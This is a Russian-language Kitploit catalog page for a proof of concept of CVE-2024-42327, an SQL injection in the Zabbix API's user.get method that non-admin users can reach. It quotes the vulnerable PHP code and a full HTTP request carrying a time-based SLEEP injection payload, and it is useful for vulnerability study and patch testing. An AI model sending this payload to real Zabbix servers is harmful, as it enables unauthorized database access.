Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-42327 — Доказательство концепции эксплуатации для CVE-2024-42327 — уязвимости SQL-инъекции в API фронтенда Zabbix, позволяющей не-администраторам выполнять произвольные SQL-запросы через метод user.get. | Kitploit
Инструменты/GitHubGitHub/compr00t/cve-2024-42327
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubcompr00t/cve-2024-42327

CVE-2024-42327

Доказательство концепции эксплуатации для CVE-2024-42327 — уязвимости SQL-инъекции в API фронтенда Zabbix, позволяющей не-администраторам выполнять произвольные SQL-запросы через метод user.get.

Репозиторий
18521 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC для CVE-2024-42327 / ZBX-25623

Учетная запись пользователя без прав администратора на интерфейсе Zabbix с ролью по умолчанию "Пользователь" или с любой другой ролью, предоставляющей доступ к API, может использовать эту уязвимость. SQL-инъекция существует в классе CUser в функции addRelatedObjects; эта функция вызывается из функции CUser.get, которая доступна любому пользователю, имеющему доступ к API.

Отказ от ответственности

Данный скрипт предоставлен исключительно в образовательных целях!

Доказательство концепции

Следующий код из версии 6.0.31 уязвим к SQL-инъекции:

root@kitploit:~
$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

Следующий вызов запускает уязвимость:

root@kitploit:~
POST /api_jsonrpc.php HTTP/1.1
Host: localhost
User-Agent: curl/8.11.0
Accept: */*
Content-Type: application/json
Content-Length: 222
Connection: keep-alive

{
  "jsonrpc": "2.0",
  "method": "user.get",
  "params": {
    "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
    "userids": ["1","2"]
  },
  "id": 1,
  "auth": ""
}

Ссылки

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
Скачать инструмент